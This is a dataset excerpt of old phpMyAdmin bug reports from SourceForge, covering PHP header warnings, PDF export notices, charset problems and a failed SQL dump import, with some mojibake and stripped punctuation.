Le damos a la opcixc3xb3n de editar la primera lxc3xadnea que es 5.168.192.in addr.arpa , 3600, SOA , ns2.dominio.net root.dominio.net 1 1H 15M 14D 12H ) 2\.
Generamos todas las modificaciones que deseamos por ejemplo el campo xe2x80x9cnamexe2x80x9d lo dejamos de la siguiente forma 5.168.192.in addr.arpaA 3\.
Y al darle al botxc3xb3n de Continuar vemos que en la siguiente pxc3xa1gina sale el siguiente error Warning Invalid argument supplied for foreach ) in home www mysql.dominio.net htdocs phpMyAdmin 2.8.0 tbl replace.php on line 155 Warning Cannot modify header information headers already sent by output started at home www mysql.dominio.net htdocs phpMyAdmin 2.8.0 tbl replace.php 155) in home www mysql.dominio.net htdocs phpMyAdmin 2.8.0 libraries common.lib.php on line 103 Original URL https sourceforge.net p phpmyadmin support requests 855 https sourceforge.net p phpmyadmin support requests 855 Original author vsc55","bug"
"24444","2674","Export to PDF=Warning Undefined offset 0 in fpdf.php.
When exporting to PDF format and writing to the SaveDir folder defined and writable) the following warnings are printed to screen Notice Undefined offset 0 in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php on line 1612 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php 1612) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php 1612) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php 1612) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php 1612) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php 1612) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\fpdf\fpdf.php 1612) in D \Inetpub\wwwroot intra\admin\phpMyAdmin 2.8.0.1\libraries\header http.inc.php on line 19 This does not occur when the file is not saved to SaveDir.
See also 1450555 Original URL https sourceforge.net p phpmyadmin support requests 856 https sourceforge.net p phpmyadmin support requests 856 Original author xangelusx","bug"
"24444","2675","require ) failed.
When i add a new row to a table this message will appear Warning main .
sql.php 3Fdb 3Dpostfix 26amp 3Btable 3Dusers 26amp 3Bserver 3D5 26amp 3Bpos 3D0 26amp 3Bsession max rows 3D30 26amp 3Bdisp direction 3Dhorizontal 26amp 3Brepeat cells 3D100 26amp 3Bdontlimitchars 3D0 26amp 3Bsql query 3DSELECT 2B 252A 2BFROM 2B 2560users 2560) failed to open stream No error in d \appserv\www\phpmyadmin\tbl replace.php on line 275 Fatal error main ) Failed opening required .
sql.
php 3Fdb 3Dpostfix 26amp 3Btable 3Dusers 26amp 3Bserver 3D5 26amp 3Bpos 3D0 26amp 3Bsession max rows 3D30 26amp 3Bdisp direction 3Dhorizontal 26amp 3Brepeat cells 3D100 26amp 3Bdontlimitchars 3D0 26amp 3Bsql query 3DSELECT 2B 252A 2BFROM 2B 2560users 2560 include path= .
;c \php4\pear ) in d \appserv\www\phpmyadmin\tbl replace.php on line 275 The row is added fine, but the require in the line 275 failes.
I run PHP 4.3.11 with Apache 1.3.33 and MySQL 4.1.11 Original URL https sourceforge.net p phpmyadmin support requests 857 https sourceforge.net p phpmyadmin support requests 857 Original author elflein","bug"
"24444","2676","wrong refresh query.
1\.
when i need to browse a specific table, i click on browse in the top horizontal menu and i surprisingly) get the rows from that particular table.
the query used for this action as shown in SQL query field is this SELECT FROM `tsk group permissions` LIMIT 0 , 30 2\.
this table contains more than 30 rows, so when i need to look at some of those, i click on next .
the query used for this action is SELECT FROM `tsk group permissions` LIMIT 30 , 30 3\.
now i make any change to any row using a script that is not part of PMA, but id like to see if the result of the change is as expected, so i click on Refresh underneath the SQL query field.
the problem is, that it gets me to the beginning of the table.
in other words, the query used for this action is this SELECT FROM `tsk group permissions` LIMIT 0 , 30 while, the URL of the Refresh link ends with this sql query=SELECT 2A FROM 60tsk group permissions 60 i guess that by clicking the Refresh link, it should get me back to the rows from the limit 30,30 and not back to the beginning 0,30).
i know i could just type in the required values to the Show x records starting from record y , but this shouldnt be the solution for this interface problem .
Original URL https sourceforge.net p phpmyadmin support requests 858 https sourceforge.net p phpmyadmin support requests 858 Original author shylauda69","bug"
"24444","2677","[HEAD] CREATE DB execute twice.
in current cvs head i get an error db already exists if i create a new db with create new db form, seems the query is execute twice Original URL https sourceforge.net p phpmyadmin support requests 880 https sourceforge.net p phpmyadmin support requests 880 Original author cybot tm Found in version Latest Git","bug"
"24444","2678","UTF 8 characters showing like non UTF after upgrading to MyS.
I moved some applications to a new machine with new MySQL 4.0.15 gt; 4.1.12) and had to notice that in PHPMyAdmin all special characters which were submitted as UTF 8 now show as double byte characters as if the output was iso 8859 1 and not UTF 8.
On the other hand, in the application they were originally submitted most special characters do show correctly.
So far I have noticed that the german xc3x9c and xc3x9f show as a turkish y two dots above it).
Other languages may be affected as well.
This database contains quite a few languages with special characters, but I wouldn t notice if some of them are wrong now, too, since I don t know these languages.
Now, the underlying problem obviously is what can be found in the MySQL documentation at http dev.mysql.com doc refman 4.1 en charset conversion.html http dev.mysql.com doc refman 4.1 en charset upgrading.html However, converting columns doesn t make a difference and they do already show seemingly correct values latin1 for global character sets and latin1 swedish for collation), so there s not much room for conversion.
This also explains why it is almost ok in the original application.
It s still a mystery with the y characters, though.
I posted in a German PHP newsgroup about this and just got feedback that others have noticed this problem as well and no solution yet.
It seems PHPMyAdmin forces UTF 8 for the client connection as is shown by the MySQL variable output and this seems to create the massive difference.
This seems to be hard coded and I looked at the demo of 2.8 at Alexander Turek s site and there it is still hard coded, so I don t expect a solution from upgrading.
To summarize there seem to be two problems.
1. the change in MySQL, 2.
PHPMyAdmin forcing UTF 8 for the client connection.
If there is a real solution on the MySQL side I would surely like to implement it.
If not, I would at least want to be able to change the PHPMyAdmin behavior so that I get the same character output shown as in other PHP applications.
Here is some relevant version variable data old software Suse 9.0, PHP 4.2.irgendwas, MySQL 4.0.15, PHPMyAdmin 2.6.1 new software CentOS 4.2, PHP 4.3.9, MySQL 4.1.12, PHPMyAdmin 2.6.1 old variables according to PHPMyAdmin first session, second global) character set latin1 latin1 new variables according to PHPMyAdmin first session, second global)) character set client utf8 latin1 character set connection latin1 latin1 character set database latin1 latin1 character set results utf8 latin1 character set server latin1 latin1 character set system utf8 utf8 character sets dir usr share mysql charsets usr share mysql char sets collation connection latin1 swedish ci latin1 swedish ci collation database latin1 swedish ci latin1 swedish ci collation server latin1 swedish ci latin1 swedish ci Original URL https sourceforge.net p phpmyadmin support requests 859 https sourceforge.net p phpmyadmin support requests 859 Original author kai schaetzl Found in version 2.6.1","bug"
"24444","2679","Browser Error.
When I log in into PHPMYadmin I get the following error Unknown language en.
Any ideas?
what is happening?
Regards, Walter Original URL https sourceforge.net p phpmyadmin support requests 883 https sourceforge.net p phpmyadmin support requests 883 Original author walter perris Found in version Latest Git","bug"
"24444","2680","Cannot modify header error on first request.
phpMyAdmin 2.8.0.2 MySQL client version 4.0.16 Used PHP extensions mysql MySQL 4.1.18 log Protocol version 10 FreeBSD 4.8 STABLE Apache 1.3.29 PHP Version 4.3.10 USER AGENT Mozilla 5.0 Windows; U; Windows NT 5.1; en US; rv 1.8.0.1) Gecko 20060111 Firefox 1.5.0.1 When I first visit phpMyAdmin IE visit https myhost mypath phpMyAdmin index.php), I receive these 2 error messages only IE nothing else appears on the homepage) Warning Cannot modify header information headers already sent by output started at lt;phpMyAdmin Install Path gt; libraries Config.class.php 351) eval ) d code 1) in lt;phpMyAdmin Install Path gt; libraries common.lib.php on line 2609 Warning Cannot modify header information headers already sent by output started at lt;phpMyAdmin Install Path gt; libraries Config.class.php 351) eval ) d code 1) in lt;phpMyAdmin Install Path gt; index.php on line 105 Here are the request and response HTTP headers GET lt;URL path gt; index.php HTTP 1.1 Host lt;myhost.com gt; User Agent Mozilla 5.0 Windows; U; Windows NT 5.1; en US; rv 1.8.0.1) Gecko 20060111 Firefox 1.5.0.1 Accept text xml,application xml,application xhtml xml,text html;q=0.9,text plain;q=0.8,image png, ;q=0.5 Accept Language en ca,en us;q=0.7,en;q=0.3 Accept Encoding gzip,deflate Accept Charset ISO 8859 1,utf 8;q=0.7, ;q=0.7 Keep Alive 300 Connection keep alive Cookie pma lang=en utf 8; pma collation connection=utf8 unicode ci; pma charset=iso 8859 1 Authorization Basic lt;base64 encoded string gt; HTTP 1.x 200 OK Date Wed, 22 Mar 2006 00 52 12 GMT Server Apache 1.3.29 X Powered By PHP 4.3.10 Set Cookie phpMyAdmin= lt;32 character string gt;; path= lt;URL path gt; ; secure Expires Thu, 19 Nov 1981 08 52 00 GMT Cache Control no store, no cache, must revalidate, post check=0, pre check=0 Pragma no cache Keep Alive timeout=5, max=99 Connection Keep Alive Transfer Encoding chunked Content Type text html If I then hit refresh, everything is fine.
No more error messages and the start page initial frameset) is displayed as expected.
Here are the request and response headers upon refresh GET lt;URL path gt; index.php HTTP 1.1 Host lt;myhost.com gt; User Agent Mozilla 5.0 Windows; U; Windows NT 5.1; en US; rv 1.8.0.1) Gecko 20060111 Firefox 1.5.0.1 Accept text xml,application xml,application xhtml xml,text html;q=0.9,text plain;q=0.8,image png, ;q=0.5 Accept Language en ca,en us;q=0.7,en;q=0.3 Accept Encoding gzip,deflate Accept Charset ISO 8859 1,utf 8;q=0.7, ;q=0.7 Keep Alive 300 Connection keep alive Cookie pma lang=en utf 8; pma collation connection=utf8 unicode ci; pma charset=iso 8859 1; phpMyAdmin= lt;32 character string gt; Authorization Basic lt;base64 encoded string gt; Cache Control max age=0 HTTP 1.x 200 OK Date Wed, 22 Mar 2006 00 55 11 GMT Server Apache 1.3.29 X Powered By PHP 4.3.10 Expires Thu, 19 Nov 1981 08 52 00 GMT Cache Control no store, no cache, must revalidate, post check=0, pre check=0 Pragma no cache Set Cookie pma theme=deleted; expires=Tue, 22 Mar 05 00 55 14 GMT; secure Keep Alive timeout=5, max=100 Connection Keep Alive Transfer Encoding chunked Content Type text html; charset=utf 8 I don t mind hitting refresh every time I start a session.
Just thought you should know about this.
Original URL https sourceforge.net p phpmyadmin support requests 860 https sourceforge.net p phpmyadmin support requests 860 Original author kencl","bug"
"24444","2681","Import problem.
gt;Sorry I m a newbee gt;I am trying to import the following MySQL dump 10.9 Host localhost Database sureinvoice Server version 4.1.10a Debian 2ubuntu0.1 log !40014 SET OLD UNIQUE CHECKS= UNIQUE CHECKS, UNIQUE CHECKS=0 ; !40014 SET OLD FOREIGN KEY CHECKS= FOREIGN KEY CHECKS, FOREIGN KEY CHECKS=0 ; !40101 SET OLD SQL MODE= SQL MODE, SQL MODE= NO AUTO VALUE ON ZERO,MYSQL323 ; Table structure for table `attachments` DROP TABLE IF EXISTS `attachments`; CREATE TABLE `attachments` `id` int 11) unsigned NOT NULL auto increment, `project id` int 11) unsigned NOT NULL default 0 , `task id` int 11) unsigned NOT NULL default 0 , `activity id` int 11) unsigned NOT NULL default 0 , `path` varchar 255) NOT NULL default , `description` varchar 255) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `check transactions` DROP TABLE IF EXISTS `check transactions`; CREATE TABLE `check transactions` `id` int 11) unsigned NOT NULL auto increment, `type` enum COST , COMM ) NOT NULL default COST , `check id` int 11) unsigned NOT NULL default 0 , `trans id` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `checks` DROP TABLE IF EXISTS `checks`; CREATE TABLE `checks` `id` int 11) unsigned NOT NULL auto increment, `user id` int 11) unsigned NOT NULL default 0 , `type` enum CHECK , EFT , CC ) NOT NULL default CHECK , `number` int 10) unsigned NOT NULL default 0 , `name` varchar 100) NOT NULL default , `address1` varchar 100) NOT NULL default , `address2` varchar 100) NOT NULL default , `city` varchar 100) NOT NULL default , `state` varchar 10) NOT NULL default , `zip` varchar 10) NOT NULL default , `description` varchar 255) NOT NULL default , `amount` float 8,2) NOT NULL default 0.00 , `timestamp` int 11) unsigned NOT NULL default 0 , `trans id` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `companies` DROP TABLE IF EXISTS `companies`; CREATE TABLE `companies` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 100) NOT NULL default , `address1` varchar 100) NOT NULL default , `address2` varchar 100) NOT NULL default , `city` varchar 100) NOT NULL default , `state` varchar 10) NOT NULL default , `zip` varchar 11) NOT NULL default , `phone` varchar 15) NOT NULL default , `fax` varchar 15) NOT NULL default , `hourly rate` float 5,2) NOT NULL default 0.00 , `created ts` int 11) unsigned NOT NULL default 0 , `updated ts` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `company prices` DROP TABLE IF EXISTS `company prices`; CREATE TABLE `company prices` `company id` int 11) unsigned NOT NULL default 0 , `item code id` int 11) unsigned NOT NULL default 0 , `price` float 5,2) NOT NULL default 0.00 , `tax rate` float 5,4) NOT NULL default 0.0000 , PRIMARY KEY `company id`,`item code id`) ) TYPE=MyISAM; Table structure for table `company transactions` DROP TABLE IF EXISTS `company transactions`; CREATE TABLE `company transactions` `id` int 11) unsigned NOT NULL auto increment, `company id` int 11) unsigned NOT NULL default 0 , `timestamp` int 11) unsigned NOT NULL default 0 , `amount` float 8,2) NOT NULL default 0.00 , `description` varchar 255) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `config` DROP TABLE IF EXISTS `config`; CREATE TABLE `config` `name` varchar 100) NOT NULL default , `value` varchar 255) NOT NULL default , PRIMARY KEY `name`) ) TYPE=MyISAM; Table structure for table `expenses` DROP TABLE IF EXISTS `expenses`; CREATE TABLE `expenses` `id` int 11) unsigned NOT NULL auto increment, `company id` int 11) unsigned NOT NULL default 0 , `task id` int 11) unsigned NOT NULL default 0 , `project id` int 11) unsigned NOT NULL default 0 , `description` varchar 255) NOT NULL default , `cost` float 8,2) NOT NULL default 0.00 , `price` float 8,2) NOT NULL default 0.00 , `created ts` int 11) unsigned NOT NULL default 0 , `item code id` int 11) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `invoice line links` DROP TABLE IF EXISTS `invoice line links`; CREATE TABLE `invoice line links` `id` int 11) unsigned NOT NULL auto increment, `invoice line id` int 11) unsigned NOT NULL default 0 , `task activity id` int 10) unsigned NOT NULL default 0 , `expense id` int 10) unsigned NOT NULL default 0 , `payment schedule id` int 10) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `invoice lines` DROP TABLE IF EXISTS `invoice lines`; CREATE TABLE `invoice lines` `id` int 11) unsigned NOT NULL auto increment, `invoice id` int 11) unsigned NOT NULL default 0 , `quantity` float 5,2) NOT NULL default 0.00 , `description` varchar 255) NOT NULL default , `unit price` float 8,2) NOT NULL default 0.00 , `item code id` int 11) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `invoices` DROP TABLE IF EXISTS `invoices`; CREATE TABLE `invoices` `id` int 11) unsigned NOT NULL auto increment, `company id` int 11) unsigned NOT NULL default 0 , `address1` varchar 100) NOT NULL default , `address2` varchar 100) NOT NULL default , `city` varchar 100) NOT NULL default , `state` varchar 10) NOT NULL default , `zip` varchar 15) NOT NULL default , `timestamp` int 11) unsigned NOT NULL default 0 , `terms` enum NET15 , NET30 , NET45 ) NOT NULL default NET15 , `trans id` int 11) unsigned NOT NULL default 0 , `sent ts` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `issue attachments` DROP TABLE IF EXISTS `issue attachments`; CREATE TABLE `issue attachments` `id` int 11) unsigned NOT NULL auto increment, `issue id` int 11) unsigned NOT NULL default 0 , `user id` int 11) unsigned NOT NULL default 0 , `file` varchar 255) NOT NULL default , `created ts` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `issue comments` DROP TABLE IF EXISTS `issue comments`; CREATE TABLE `issue comments` `id` int 11) unsigned NOT NULL auto increment, `issue id` int 11) unsigned NOT NULL default 0 , `user id` int 11) unsigned NOT NULL default 0 , `text` text NOT NULL, `created ts` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `issue priorities` DROP TABLE IF EXISTS `issue priorities`; CREATE TABLE `issue priorities` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `priority level` int 11) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `issue statuses` DROP TABLE IF EXISTS `issue statuses`; CREATE TABLE `issue statuses` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `closed` enum Y , N ) default N , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `issues` DROP TABLE IF EXISTS `issues`; CREATE TABLE `issues` `id` int 11) unsigned NOT NULL auto increment, `project id` int 11) unsigned NOT NULL default 0 , `assigned id` int 11) unsigned NOT NULL default 0 , `priority id` int 11) unsigned NOT NULL default 0 , `status id` int 11) unsigned NOT NULL default 0 , `reported by id` int 11) unsigned NOT NULL default 0 , `summary` varchar 255) NOT NULL default , `description` text NOT NULL, PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `issues to task` DROP TABLE IF EXISTS `issues to task`; CREATE TABLE `issues to task` `issue id` int 11) unsigned NOT NULL default 0 , `task id` int 11) unsigned NOT NULL default 0 , UNIQUE KEY `PRIMARY KEY` `issue id`,`task id`) ) TYPE=MyISAM; Table structure for table `item codes` DROP TABLE IF EXISTS `item codes`; CREATE TABLE `item codes` `id` int 11) unsigned NOT NULL auto increment, `code` varchar 25) NOT NULL default , `description` varchar 255) NOT NULL default , `cost` float 5,2) NOT NULL default 0.00 , `price` float 5,2) NOT NULL default 0.00 , `taxable` enum Y , N ) NOT NULL default N , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `payment invoices` DROP TABLE IF EXISTS `payment invoices`; CREATE TABLE `payment invoices` `id` int 10) unsigned NOT NULL auto increment, `payment id` int 10) unsigned NOT NULL default 0 , `invoice id` int 10) unsigned NOT NULL default 0 , `amount` float 7,2) NOT NULL default 0.00 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `payment schedule` DROP TABLE IF EXISTS `payment schedule`; CREATE TABLE `payment schedule` `id` int 10) unsigned NOT NULL auto increment, `project id` int 10) unsigned NOT NULL default 0 , `task id` int 10) unsigned NOT NULL default 0 , `amount` float 8,2) NOT NULL default 0.00 , `due ts` int 10) unsigned NOT NULL default 0 , `description` varchar 255) NOT NULL default , `item code id` int 11) NOT NULL default 0 , PRIMARY KEY `id`), KEY `task id` `task id`), KEY `project id` `project id`) ) TYPE=MyISAM; Table structure for table `payments` DROP TABLE IF EXISTS `payments`; CREATE TABLE `payments` `id` int 11) unsigned NOT NULL auto increment, `company id` int 10) unsigned NOT NULL default 0 , `timestamp` int 11) unsigned NOT NULL default 0 , `amount` float 8,2) NOT NULL default 0.00 , `type` enum CHECK , CC , CASH ) NOT NULL default CHECK , `check no` int 11) NOT NULL default 0 , `auth code` varchar 50) NOT NULL default , `trans id` int 10) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `phpnotify notification addresses` DROP TABLE IF EXISTS `phpnotify notification addresses`; CREATE TABLE `phpnotify notification addresses` `id` int 11) unsigned NOT NULL auto increment, `notification id` int 11) unsigned NOT NULL default 0 , `address` varchar 255) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `phpnotify notification macros` DROP TABLE IF EXISTS `phpnotify notification macros`; CREATE TABLE `phpnotify notification macros` `id` int 11) unsigned NOT NULL auto increment, `notification id` int 11) unsigned NOT NULL default 0 , `name` varchar 255) NOT NULL default , `description` varchar 255) NOT NULL default , PRIMARY KEY `id`), KEY `notification id` `notification id`) ) TYPE=MyISAM; Table structure for table `phpnotify notifications` DROP TABLE IF EXISTS `phpnotify notifications`; CREATE TABLE `phpnotify notifications` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 50) NOT NULL default , `description` text NOT NULL, `from address` varchar 255) NOT NULL default , `subject` varchar 255) NOT NULL default , `email` text NOT NULL, `active` enum Y , N ) NOT NULL default Y , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `project cc` DROP TABLE IF EXISTS `project cc`; CREATE TABLE `project cc` `project id` int 11) unsigned NOT NULL default 0 , `user id` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `project id`,`user id`) ) TYPE=MyISAM; Table structure for table `project notes` DROP TABLE IF EXISTS `project notes`; CREATE TABLE `project notes` `id` int 11) unsigned NOT NULL auto increment, `project id` int 11) unsigned NOT NULL default 0 , `user id` int 11) unsigned NOT NULL default 0 , `text` text NOT NULL, `created ts` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `project priorities` DROP TABLE IF EXISTS `project priorities`; CREATE TABLE `project priorities` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `priority level` int 11) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `project statuses` DROP TABLE IF EXISTS `project statuses`; CREATE TABLE `project statuses` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `completed` enum Y , N ) default N , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `projects` DROP TABLE IF EXISTS `projects`; CREATE TABLE `projects` `id` int 11) unsigned NOT NULL auto increment, `owner id` int 11) unsigned NOT NULL default 0 , `company id` int 11) unsigned NOT NULL default 0 , `project status id` int 11) unsigned NOT NULL default 0 , `project priority id` int 11) unsigned NOT NULL default 0 , `name` varchar 150) NOT NULL default , `description` text NOT NULL, `due ts` int 11) unsigned NOT NULL default 0 , `billable` enum Y , N , S ) NOT NULL default Y , `issue tracking` enum Y , N ) NOT NULL default Y , `created ts` int 11) unsigned NOT NULL default 0 , `updated ts` int 11) unsigned NOT NULL default 0 , `sales com` enum Y , N ) NOT NULL default N , `sales com type id` int 11) unsigned NOT NULL default 0 , `sales com user id` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `sales com types` DROP TABLE IF EXISTS `sales com types`; CREATE TABLE `sales com types` `id` int 10) unsigned NOT NULL auto increment, `name` varchar 255) NOT NULL default , `type` enum AMOUNT , PERCENT NET , PERCENT GROSS ) NOT NULL default AMOUNT , `rate` float 7,2) NOT NULL default 0.00 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `task activities` DROP TABLE IF EXISTS `task activities`; CREATE TABLE `task activities` `id` int 11) unsigned NOT NULL auto increment, `task id` int 11) unsigned NOT NULL default 0 , `user id` int 11) unsigned NOT NULL default 0 , `text` text NOT NULL, `start ts` int 11) unsigned NOT NULL default 0 , `end ts` int 11) unsigned NOT NULL default 0 , `hourly cost` float 8,2) NOT NULL default 0.00 , `hourly rate` float 8,2) NOT NULL default 0.00 , `cost trans id` int 11) unsigned NOT NULL default 0 , `com trans id` int 11) unsigned NOT NULL default 0 , `invoice id` int 11) unsigned NOT NULL default 0 , `sales com type id` int 11) unsigned NOT NULL default 0 , `item code id` int 11) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `task items` DROP TABLE IF EXISTS `task items`; CREATE TABLE `task items` `id` int 11) unsigned NOT NULL auto increment, `task id` int 11) unsigned NOT NULL default 0 , `item` varchar 255) NOT NULL default , `task activity id` int 11) unsigned NOT NULL default 0 , `parent id` int 11) unsigned NOT NULL default 0 , `order number` int 11) NOT NULL default 0 , PRIMARY KEY `id`), UNIQUE KEY `IDX order number` `task id`,`parent id`,`order number`), KEY `TASK ID` `task id`), KEY `parent id` `parent id`) ) TYPE=MyISAM; Table structure for table `task priorities` DROP TABLE IF EXISTS `task priorities`; CREATE TABLE `task priorities` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `priority level` int 11) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `task statuses` DROP TABLE IF EXISTS `task statuses`; CREATE TABLE `task statuses` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `completed` enum Y , N ) default N , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `tasks` DROP TABLE IF EXISTS `tasks`; CREATE TABLE `tasks` `id` int 11) unsigned NOT NULL auto increment, `project id` int 11) unsigned NOT NULL default 0 , `name` varchar 150) NOT NULL default , `description` text NOT NULL, `task status id` int 11) unsigned NOT NULL default 0 , `task priority id` int 11) unsigned NOT NULL default 0 , `due ts` int 11) unsigned NOT NULL default 0 , `type` enum FREEFORM , ITEMIZED ) NOT NULL default FREEFORM , `billable` enum Y , N , D , S ) NOT NULL default D , `created ts` int 11) unsigned NOT NULL default 0 , `updated ts` int 11) unsigned NOT NULL default 0 , `sales com` enum Y , N , D ) NOT NULL default D , `sales com type id` int 11) unsigned NOT NULL default 0 , `sales com user id` int 11) unsigned NOT NULL default 0 , `amount` float 9,2) unsigned NOT NULL default 0.00 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `user project rights` DROP TABLE IF EXISTS `user project rights`; CREATE TABLE `user project rights` `user id` int 10) unsigned NOT NULL default 0 , `project id` int 10) unsigned NOT NULL default 0 , `level` int 10) unsigned NOT NULL default 0 , PRIMARY KEY `user id`,`project id`) ) TYPE=MyISAM; Table structure for table `user rights` DROP TABLE IF EXISTS `user rights`; CREATE TABLE `user rights` `id` int 11) unsigned NOT NULL auto increment, `user id` int 11) unsigned NOT NULL default 0 , `user right` varchar 50) NOT NULL default , `right value` smallint 6) NOT NULL default 0 , PRIMARY KEY `id`), UNIQUE KEY `IDX user id right` `user id`,`user right`) ) TYPE=MyISAM; Table structure for table `user transactions` DROP TABLE IF EXISTS `user transactions`; CREATE TABLE `user transactions` `id` int 11) unsigned NOT NULL auto increment, `user id` int 11) unsigned NOT NULL default 0 , `timestamp` int 11) unsigned NOT NULL default 0 , `amount` float 8,2) NOT NULL default 0.00 , `description` varchar 255) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `user types` DROP TABLE IF EXISTS `user types`; CREATE TABLE `user types` `id` int 11) unsigned NOT NULL auto increment, `name` varchar 150) NOT NULL default , `resource` enum Y , N ) NOT NULL default N , `start page` varchar 255) NOT NULL default my projects.php , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `users` DROP TABLE IF EXISTS `users`; CREATE TABLE `users` `id` int 11) unsigned NOT NULL auto increment, `user type id` int 11) unsigned NOT NULL default 0 , `first name` varchar 50) NOT NULL default , `last name` varchar 50) NOT NULL default , `company id` int 11) unsigned NOT NULL default 0 , `address1` varchar 200) NOT NULL default , `address2` varchar 200) NOT NULL default , `city` varchar 150) NOT NULL default , `state` varchar 5) NOT NULL default , `zip` varchar 11) NOT NULL default , `email` varchar 255) NOT NULL default , `password` varchar 150) NOT NULL default , `salary` int 11) unsigned NOT NULL default 0 , `hourly rate` float 5,2) unsigned NOT NULL default 0.00 , `rate type` enum SALARY , HOURLY , HALF CUST RATE ) NOT NULL default SALARY , `active` enum Y , N ) NOT NULL default Y , `invoiced` enum Y , N ) NOT NULL default N , `created ts` int 11) unsigned default 0 , `updated ts` int 11) unsigned NOT NULL default 0 , `last login ts` int 11) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM; Table structure for table `users to task` DROP TABLE IF EXISTS `users to task`; CREATE TABLE `users to task` `id` int 11) unsigned NOT NULL default 0 , `task id` int 11) unsigned NOT NULL default 0 , `user id` int 11) unsigned NOT NULL default 0 , `estimated minutes` int 11) unsigned NOT NULL default 0 , `hourly cost` float 5,2) NOT NULL default 0.00 , PRIMARY KEY `id`) ) TYPE=MyISAM; !40101 SET SQL MODE= OLD SQL MODE ; !40014 SET FOREIGN KEY CHECKS= OLD FOREIGN KEY CHECKS ; !40014 SET UNIQUE CHECKS= OLD UNIQUE CHECKS ; gt; gt; gt; gt; gt; gt;But when I try to import I get the following.
MySQL dump 10.9 Host localhost Database sureinvoice Server version 4.1.10a Debian 2ubuntu0.1 log !40014 SET OLD UNIQUE CHECKS= UNIQUE CHECKS, UNIQUE CHECKS=0 ; MySQL said 1065 Query was empty Any Ideas on how to get around this?
Please Original URL https sourceforge.net p phpmyadmin support requests 884 https sourceforge.net p phpmyadmin support requests 884 Original author ms8398","bug"
"24444","2682","phpMyAdmin 2.8.0.3 The mbstring PHP extension was not fo.
I have been trying for hours to resolve this issue.
This is a FreeBSD 6.0 server Running Apache 2.2.2 Mysql 5.1.7 beta phpMyAdmin 2.8.0.3 PHP 5.1.3 Compiled with .
configure with mysql with apxs2= usr local sbin apxs with mbstrings The complete error message The mbstring PHP extension was not found and you seem to be using a multibyte charset.
